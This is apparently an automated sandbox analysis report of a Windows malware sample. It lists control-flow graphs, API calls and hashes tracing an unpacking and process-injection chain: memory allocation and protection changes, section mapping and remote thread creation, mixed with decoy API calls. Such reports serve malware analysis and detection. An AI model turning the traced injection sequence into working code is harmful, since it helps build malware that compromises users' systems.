                                                                                                                                                                control_flow_graph 71 216003c-2160047 72 216004c-2160263 call 2160a3f call 2160e0f call 2160d90 VirtualAlloc 71->72 73 2160049 71->73 88 2160265-2160289 call 2160a69 72->88 89 216028b-2160292 72->89 73->72 94 21602ce-21603c2 VirtualProtect call 2160cce call 2160ce7 88->94 91 21602a1-21602b0 89->91 93 21602b2-21602cc 91->93 91->94 93->91 100 21603d1-21603e0 94->100 101 21603e2-2160437 call 2160ce7 100->101 102 2160439-21604b8 VirtualFree 100->102 101->100 103 21605f4-21605fe 102->103 104 21604be-21604cd 102->104 108 2160604-216060d 103->108 109 216077f-2160789 103->109 107 21604d3-21604dd 104->107 107->103 111 21604e3-2160505 107->111 108->109 114 2160613-2160637 108->114 112 21607a6-21607b0 109->112 113 216078b-21607a3 109->113 122 2160517-2160520 111->122 123 2160507-2160515 111->123 115 21607b6-21607cb 112->115 116 216086e-21608be LoadLibraryA 112->116 113->112 117 216063e-2160648 114->117 119 21607d2-21607d5 115->119 121 21608c7-21608f9 116->121 117->109 120 216064e-216065a 117->120 124 21607d7-21607e0 119->124 125 2160824-2160833 119->125 120->109 126 2160660-216066a 120->126 127 2160902-216091d 121->127 128 21608fb-2160901 121->128 129 2160526-2160547 122->129 123->129 130 21607e4-2160822 124->130 131 21607e2 124->131 133 2160839-216083c 125->133 132 216067a-2160689 126->132 128->127 134 216054d-2160550 129->134 130->119 131->125 135 2160750-216077a 132->135 136 216068f-21606b2 132->136 133->116 137 216083e-2160847 133->137 139 2160556-216056b 134->139 140 21605e0-21605ef 134->140 135->117 141 21606b4-21606ed 136->141 142 21606ef-21606fc 136->142 143 216084b-216086c 137->143 144 2160849 137->144 147 216056f-216057a 139->147 148 216056d 139->148 140->107 141->142 145 21606fe-2160748 142->145 146 216074b 142->146 143->133 144->116 145->146 146->132 151 216057c-2160599 147->151 152 216059b-21605bb 147->152 148->140 155 21605bd-21605db 151->155 152->155 155->134
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0216024D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067784518.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_2160000_4470.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID: cess$kernel32.dll
                                                                                                                                                                • API String ID: 4275171209-1230238691
                                                                                                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                • Instruction ID: b5ed4fde32294e7aa38a0e3cc414e3c7c438f795dd78e2fb808d139c398ac453
                                                                                                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                • Instruction Fuzzy Hash: 82526974A41229DFDB64CF58C984BACBBB1BF09304F1580E9E94DAB351DB30AA95CF14

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 390 418680-4187c0 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00513D70), ref: 0041875F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041879C
                                                                                                                                                                • VirtualProtect.KERNELBASE(00513BB4,00513D6C,00000040,?), ref: 004187BB
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067190050.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_40b000_4470.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2099061454-3916222277
                                                                                                                                                                • Opcode ID: b0d71d924eafd95e8b272ae87613061a2da4c91cb80ff2e628796a3ba898e1cf
                                                                                                                                                                • Instruction ID: 2155bd9b31e59c350c635bb378a89ddac8c1e1b9edbf8731bf03073443d6ecc1
                                                                                                                                                                • Opcode Fuzzy Hash: b0d71d924eafd95e8b272ae87613061a2da4c91cb80ff2e628796a3ba898e1cf
                                                                                                                                                                • Instruction Fuzzy Hash: CB315E18518780CAE301DB79FC257823F6AAB75744F04D1ACD54C8B3B1D7BA1618E36E

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 408 6d054e-6d0567 409 6d0569-6d056b 408->409 410 6d056d 409->410 411 6d0572-6d057e CreateToolhelp32Snapshot 409->411 410->411 412 6d058e-6d059b Module32First 411->412 413 6d0580-6d0586 411->413 414 6d059d-6d059e call 6d020d 412->414 415 6d05a4-6d05ac 412->415 413->412 419 6d0588-6d058c 413->419 420 6d05a3 414->420 419->409 419->412 420->415
                                                                                                                                                                APIs
                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006D0576
                                                                                                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 006D0596
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067712558.00000000006CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 006CD000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_6cd000_4470.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3833638111-0
                                                                                                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                • Instruction ID: cb40f35b746772c24be4edbcd4519ba32e704b6d7ec32b48478d4cafd79e7b74
                                                                                                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                • Instruction Fuzzy Hash: AAF096319007106FE7203BF5A98DFAE76EDAF49724F10052AFA52D16C0DB70ED454E61

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 421 2160e0f-2160e24 SetErrorMode * 2 422 2160e26 421->422 423 2160e2b-2160e2c 421->423 422->423
                                                                                                                                                                APIs
                                                                                                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,02160223,?,?), ref: 02160E19
                                                                                                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,02160223,?,?), ref: 02160E1E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067784518.0000000002160000.00000040.00001000.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_2160000_4470.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                • Instruction ID: e9c0ddff7ad8c06008852dff5cd4673f15b5d7d0f17db3ceebe3952d7cf3b5ad
                                                                                                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                • Instruction Fuzzy Hash: 53D0123154512877D7002AD4DC0DBDD7B1CDF09B66F108011FB0DD9080C770954046E5

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 424 401991-4019ed call 401240 Sleep 436 4019f3-4019f5 424->436 437 4019ee call 4014c4 424->437 438 401a04-401a52 call 401240 436->438 439 4019f7-4019ff call 4015b7 436->439 437->436 439->438
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_4470.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                • Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                                                                                                                • Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
                                                                                                                                                                • Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
                                                                                                                                                                • Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 453 4019a9-4019ed call 401240 Sleep 465 4019f3-4019f5 453->465 466 4019ee call 4014c4 453->466 467 401a04-401a52 call 401240 465->467 468 4019f7-4019ff call 4015b7 465->468 466->465 468->467
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_4470.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                • Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                                                                                                                • Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
                                                                                                                                                                • Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
                                                                                                                                                                • Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 482 4019af-4019ed call 401240 Sleep 489 4019f3-4019f5 482->489 490 4019ee call 4014c4 482->490 491 401a04-401a52 call 401240 489->491 492 4019f7-4019ff call 4015b7 489->492 490->489 492->491
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_4470.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                • Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                                                                                                                • Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
                                                                                                                                                                • Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
                                                                                                                                                                • Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 506 4019b8-4019ed call 401240 Sleep 510 4019f3-4019f5 506->510 511 4019ee call 4014c4 506->511 512 401a04-401a52 call 401240 510->512 513 4019f7-4019ff call 4015b7 510->513 511->510 513->512
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067159235.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_400000_4470.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                • Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                                                                                                                • Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
                                                                                                                                                                • Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
                                                                                                                                                                • Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B
                                                                                                                                                                APIs
                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006D025E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067712558.00000000006CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 006CD000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_6cd000_4470.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                • Instruction ID: 2a0c500e09f998ada6447afdbf67cedf628d77ecd398b0aab8bbad47da5027e3
                                                                                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                • Instruction Fuzzy Hash: A4113C79A40208EFDB01DF98C989E98BFF5AF08350F058095F9489B362D371EA50DF80
                                                                                                                                                                APIs
                                                                                                                                                                • LocalAlloc.KERNELBASE(00000000,00513D6C,00418CE2), ref: 00418658
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067190050.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_40b000_4470.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocLocal
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3494564517-0
                                                                                                                                                                • Opcode ID: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                                                                                • Instruction ID: 68696ac1b9cb92420161d977e59fd9b705cf74f057d8962c0b4e3d7dbc73b596
                                                                                                                                                                • Opcode Fuzzy Hash: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                                                                                • Instruction Fuzzy Hash: FDB012F0A492009FD700CF54FC64BD03B74F358302F00C061F500C2164EB304908EB10
                                                                                                                                                                APIs
                                                                                                                                                                • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418874
                                                                                                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418886
                                                                                                                                                                • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004188C1
                                                                                                                                                                • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004188CF
                                                                                                                                                                • OpenJobObjectA.KERNEL32(00000000,00000000,0041A388), ref: 004188DE
                                                                                                                                                                • BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004188F0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067190050.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_40b000_4470.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AvailableBackupBuildCalendarCommEnvironmentFreeInfoMemoryNodeNumaObjectOpenSeekStrings
                                                                                                                                                                • String ID: -
                                                                                                                                                                • API String ID: 2332831159-2547889144
                                                                                                                                                                • Opcode ID: 3ffa615a178d9a6eecd1974a2ff3a989fac76bfbcf92ad5517bae08f135dc1d1
                                                                                                                                                                • Instruction ID: 0644f3d8bb0354bad6e2d065abd9d00753a10c55890622e6c15ca0d418187488
                                                                                                                                                                • Opcode Fuzzy Hash: 3ffa615a178d9a6eecd1974a2ff3a989fac76bfbcf92ad5517bae08f135dc1d1
                                                                                                                                                                • Instruction Fuzzy Hash: 3D11FE31A84304B7E7217BA4AD45BEE3F74AB09B11F51413DFB046A1C1CEB41D81975E
                                                                                                                                                                APIs
                                                                                                                                                                • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 004188C1
                                                                                                                                                                • SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 004188CF
                                                                                                                                                                • OpenJobObjectA.KERNEL32(00000000,00000000,0041A388), ref: 004188DE
                                                                                                                                                                • BackupSeek.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004188F0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067190050.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_40b000_4470.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AvailableBackupCalendarInfoMemoryNodeNumaObjectOpenSeek
                                                                                                                                                                • String ID: -
                                                                                                                                                                • API String ID: 1414951042-2547889144
                                                                                                                                                                • Opcode ID: 109fde75ff2b8f6bb71f73ec7f4456d624825530d7f2a813498fca8899c3c679
                                                                                                                                                                • Instruction ID: 7ad43abfb1ccff6a3ed9ab509b84ed7d9337a427fc65eba8a3385d97bacaee92
                                                                                                                                                                • Opcode Fuzzy Hash: 109fde75ff2b8f6bb71f73ec7f4456d624825530d7f2a813498fca8899c3c679
                                                                                                                                                                • Instruction Fuzzy Hash: 96F0C231A84305ABDB219FA4EC567D97B70FB08725F614268F6086E1C0CAB41A42DB8A
                                                                                                                                                                APIs
                                                                                                                                                                • QueryDosDeviceA.KERNEL32(0041A398,?,00000000), ref: 00418957
                                                                                                                                                                • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418972
                                                                                                                                                                • HeapDestroy.KERNEL32(00000000), ref: 00418991
                                                                                                                                                                • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 004189A0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2067190050.000000000040B000.00000020.00000001.01000000.00000006.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_7_2_40b000_4470.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4159173863-0
                                                                                                                                                                • Opcode ID: 6106f044a8ab3b7a482ce23ec0a1203b538232170fb1ceb5eae964420bede924
                                                                                                                                                                • Instruction ID: f860d7c9f62419cabb77a296b47f4597be1339bc88c022d8ab911ec82e630865
                                                                                                                                                                • Opcode Fuzzy Hash: 6106f044a8ab3b7a482ce23ec0a1203b538232170fb1ceb5eae964420bede924
                                                                                                                                                                • Instruction Fuzzy Hash: A20188B4940208DFD720EB64ED55BE97778D718345F40407BEA05A7290DE345E85CF9E

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:6.9%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:29.3%
                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                Total number of Nodes:164
                                                                                                                                                                Total number of Limit Nodes:7
                                                                                                                                                                execution_graph 4487 418e00 4490 4189c0 4487->4490 4489 418e05 4491 4189cd 4490->4491 4492 418ad0 7 API calls 4491->4492 4497 418c23 4491->4497 4494 418b55 7 API calls 4492->4494 4493 418c31 SetCommMask 4493->4497 4495 418c01 4494->4495 4496 418bf5 ObjectPrivilegeAuditAlarmA 4494->4496 4499 418c12 4495->4499 4500 418c0a WaitForSingleObject 4495->4500 4496->4495 4497->4493 4498 418c41 GetUserObjectInformationW 4497->4498 4501 418c62 4497->4501 4498->4497 4499->4497 4500->4499 4502 418c6b GetConsoleAliasesLengthA GetComputerNameW GetConsoleAliasExesLengthW GetBinaryType PurgeComm 4501->4502 4503 418cdd 4501->4503 4505 418cbb 4502->4505 4516 418650 LocalAlloc 4503->4516 4505->4503 4508 418ce2 LoadLibraryA 4517 418680 GetModuleHandleW GetProcAddress VirtualProtect 4508->4517 4509 418d2d 4518 418920 4509->4518 4511 418d49 MoveFileW 4513 418d32 4511->4513 4512 418d73 InterlockedCompareExchange 4512->4513 4513->4511 4513->4512 4515 418d8d 4513->4515 4515->4489 4516->4508 4517->4509 4519 418949 QueryDosDeviceA 4518->4519 4520 41895d 4518->4520 4519->4520 4529 418820 4520->4529 4523 418970 FreeEnvironmentStringsA 4524 418978 4523->4524 4532 418860 4524->4532 4527 4189a6 4527->4513 4528 41898f HeapDestroy GetNumaProcessorNode 4528->4527 4530 418831 FatalAppExitA GetModuleHandleW 4529->4530 4531 418843 4529->4531 4530->4531 4531->4523 4531->4524 4533 41887c 4532->4533 4534 41886e BuildCommDCBA 4532->4534 4535 418884 FreeEnvironmentStringsA 4533->4535 4537 41888c 4533->4537 4534->4537 4535->4537 4536 4188fb 4536->4527 4536->4528 4537->4536 4539 4188bd GetNumaAvailableMemoryNode SetCalendarInfoW OpenJobObjectA BackupSeek 4537->4539 4540 418850 4537->4540 4539->4537 4543 4187d0 4540->4543 4544 4187fb 4543->4544 4545 4187ec SetPriorityClass 4543->4545 4544->4537 4545->4544 4546 403043 4547 40319a 4546->4547 4548 40306d 4546->4548 4548->4547 4549 403128 RtlCreateUserThread NtTerminateProcess 4548->4549 4549->4547 4612 4014cf 4613 4014d3 4612->4613 4614 401660 NtDuplicateObject 4613->4614 4623 401571 4613->4623 4615 40167d NtCreateSection 4614->4615 4614->4623 4616 4016a3 NtMapViewOfSection 4615->4616 4617 4016fd NtCreateSection 4615->4617 4616->4617 4618 4016c6 NtMapViewOfSection 4616->4618 4619 401729 4617->4619 4617->4623 4618->4617 4620 4016e4 4618->4620 4621 401733 NtMapViewOfSection 4619->4621 4619->4623 4620->4617 4622 40175a NtMapViewOfSection 4621->4622 4621->4623 4622->4623 4468 6c003c 4469 6c0049 4468->4469 4481 6c0e0f SetErrorMode SetErrorMode 4469->4481 4474 6c0265 4475 6c02ce VirtualProtect 4474->4475 4477 6c030b 4475->4477 4476 6c0439 VirtualFree 4480 6c04be LoadLibraryA 4476->4480 4477->4476 4479 6c08c7 4480->4479 4482 6c0223 4481->4482 4483 6c0d90 4482->4483 4484 6c0dad 4483->4484 4485 6c0dbb GetPEB 4484->4485 4486 6c0238 VirtualAlloc 4484->4486 4485->4486 4486->4474 4718 4015d5 4719 4015e4 4718->4719 4720 401660 NtDuplicateObject 4719->4720 4726 40177c 4719->4726 4721 40167d NtCreateSection 4720->4721 4720->4726 4722 4016a3 NtMapViewOfSection 4721->4722 4723 4016fd NtCreateSection 4721->4723 4722->4723 4724 4016c6 NtMapViewOfSection 4722->4724 4725 401729 4723->4725 4723->4726 4724->4723 4727 4016e4 4724->4727 4725->4726 4728 401733 NtMapViewOfSection 4725->4728 4727->4723 4728->4726 4729 40175a NtMapViewOfSection 4728->4729 4729->4726 4550 402f16 4551 402f1a 4550->4551 4553 402fa2 4551->4553 4554 401991 4551->4554 4555 4019a0 4554->4555 4556 4019d8 Sleep 4555->4556 4558 4019f3 4556->4558 4559 4014c4 4556->4559 4558->4553 4560 4014d3 4559->4560 4561 401571 4560->4561 4562 401660 NtDuplicateObject 4560->4562 4561->4558 4562->4561 4563 40167d NtCreateSection 4562->4563 4564 4016a3 NtMapViewOfSection 4563->4564 4565 4016fd NtCreateSection 4563->4565 4564->4565 4566 4016c6 NtMapViewOfSection 4564->4566 4565->4561 4567 401729 4565->4567 4566->4565 4568 4016e4 4566->4568 4567->4561 4569 401733 NtMapViewOfSection 4567->4569 4568->4565 4569->4561 4570 40175a NtMapViewOfSection 4569->4570 4570->4561 4684 418896 4685 4188a0 4684->4685 4686 418850 SetPriorityClass 4685->4686 4687 4188bd GetNumaAvailableMemoryNode SetCalendarInfoW OpenJobObjectA BackupSeek 4685->4687 4688 4188fb 4685->4688 4686->4685 4687->4685 4689 402e9a 4690 402e5f 4689->4690 4692 402eaf 4689->4692 4691 401991 8 API calls 4693 402fa2 4691->4693 4692->4691 4692->4693 4571 710096 4572 7100a5 4571->4572 4575 710836 4572->4575 4576 710851 4575->4576 4577 71085a CreateToolhelp32Snapshot 4576->4577 4578 710876 Module32First 4576->4578 4577->4576 4577->4578 4579 710885 4578->4579 4580 7100ae 4578->4580 4582 7104f5 4579->4582 4583 710520 4582->4583 4584 710531 VirtualAlloc 4583->4584 4585 710569 4583->4585 4584->4585 4585->4585 4636 402ee7 4637 402ef9 4636->4637 4638 401991 8 API calls 4637->4638 4639 402fa2 4637->4639 4638->4639 4586 6c0005 4591 6c092b GetPEB 4586->4591 4588 6c0030 4593 6c003c 4588->4593 4592 6c0972 4591->4592 4592->4588 4594 6c0049 4593->4594 4595 6c0e0f 2 API calls 4594->4595 4596 6c0223 4595->4596 4597 6c0d90 GetPEB 4596->4597 4598 6c0238 VirtualAlloc 4597->4598 4599 6c0265 4598->4599 4600 6c02ce VirtualProtect 4599->4600 4602 6c030b 4600->4602 4601 6c0439 VirtualFree 4605 6c04be LoadLibraryA 4601->4605 4602->4601 4604 6c08c7 4605->4604 4766 4019a9 4767 4019a0 4766->4767 4768 4019d8 Sleep 4767->4768 4769 4014c4 7 API calls 4768->4769 4770 4019f3 4768->4770 4769->4770 4606 6c0001 4607 6c0005 4606->4607 4608 6c092b GetPEB 4607->4608 4609 6c0030 4608->4609 4610 6c003c 7 API calls 4609->4610 4611 6c0038 4610->4611 4694 401975 4695 401979 4694->4695 4696 4014c4 7 API calls 4695->4696 4697 4019f3 4696->4697

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 0 4189c0-4189e8 2 4189f0-4189f7 0->2 3 418a24-418a2a 2->3 4 4189f9-418a20 2->4 5 418a2c-418a38 3->5 6 418a3e-418a48 3->6 4->3 5->6 7 418a83-418a8a 6->7 8 418a4a-418a79 6->8 7->2 9 418a90-418a96 7->9 8->7 11 418a98-418a9e 9->11 12 418aa0-418aa6 11->12 13 418aac-418ab6 11->13 12->13 14 418ab8 13->14 15 418aba-418ac1 13->15 14->15 15->11 16 418ac3-418aca 15->16 17 418ad0-418bf3 InterlockedCompareExchange SetFocus ReadConsoleA FindAtomW SearchPathA GetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExA CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameW GetSystemTimeAdjustment 16->17 18 418c23-418c2f 16->18 22 418c01-418c08 17->22 23 418bf5-418bfb ObjectPrivilegeAuditAlarmA 17->23 19 418c31-418c3f SetCommMask 18->19 24 418c51-418c57 19->24 25 418c41-418c4b GetUserObjectInformationW 19->25 26 418c12-418c20 22->26 27 418c0a-418c0c WaitForSingleObject 22->27 23->22 28 418c62-418c69 24->28 29 418c59-418c60 24->29 25->24 26->18 27->26 30 418c6b-418cda GetConsoleAliasesLengthA GetComputerNameW GetConsoleAliasExesLengthW GetBinaryType PurgeComm 28->30 31 418cdd-418cec call 418650 28->31 29->19 29->28 30->31 37 418d1d-418d28 LoadLibraryA call 418680 31->37 38 418cee-418cff 31->38 44 418d2d-418d3e call 418920 37->44 39 418d00-418d10 38->39 42 418d12 39->42 43 418d18-418d1b 39->43 42->43 43->37 43->39 49 418d40-418d47 44->49 50 418d49-418d57 MoveFileW 49->50 51 418d5d-418d63 49->51 50->51 53 418d65 call 418670 51->53 54 418d6a-418d71 51->54 53->54 57 418d73-418d7e InterlockedCompareExchange 54->57 58 418d84-418d8b 54->58 57->58 58->49 60 418d8d-418d9d 58->60 62 418da0-418db0 60->62 63 418db2 62->63 64 418db9-418dbc 62->64 63->64 64->62 65 418dbe-418dc9 64->65 66 418dd0-418dd5 65->66 67 418dd7-418ddd 66->67 68 418ddf-418de5 66->68 67->68 69 418de7-418df4 67->69 68->66 68->69
                                                                                                                                                                APIs
                                                                                                                                                                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418ADB
